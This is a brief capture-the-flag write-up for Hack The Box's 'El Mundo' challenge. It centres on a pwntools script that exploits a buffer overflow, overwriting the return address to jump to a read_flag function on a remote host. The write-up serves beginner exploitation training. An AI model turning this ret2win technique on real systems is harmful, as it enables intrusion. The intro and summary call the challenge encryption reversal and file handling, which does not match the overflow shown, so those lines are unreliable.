Explore the basics of cybersecurity in the El Mundo Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/820

Description#

You may not control time, but you can certainly control the flow of your program! Use your stand to bend it to your will!

Exploitation#

#!/usr/bin/python3
from pwn import *

fname = './el_mundo'
e = ELF(fname)
read_flag_addr = 0x4016b7
offset = 56
payload = flat([
    b'A' * offset,
    p64(read_flag_addr)
])

def get_process():
    try:
        host, port = sys.argv[1].split(':')
        return remote(host, int(port))
    except IndexError:
        print(f'Usage: python {sys.argv[0]} <ip:port>')
        exit(1)

r = get_process()
try:
    r.sendlineafter('> ', payload)
    for _ in range(3):
        try:
            output = r.recv(timeout=1)
            print(output.decode('utf-8', errors='ignore'))
            if b"HTB" in output:
                print(f"Flag found!")
                break
        except EOFError:
            continue
except Exception as e:
    print(f"Error occurred: {e}")
finally:
    r.close()

Summary#

The El Mundo Challenge on Hack The Box is an easy-level challenge that provides a great introduction to concepts like encryption reversal and file handling. The challenge involves exploiting a buffer overflow vulnerability, where users craft a payload to trigger the read_flag function and retrieve the flag. The task is beginner-friendly and perfect for those looking to get hands-on experience with basic exploitation techniques.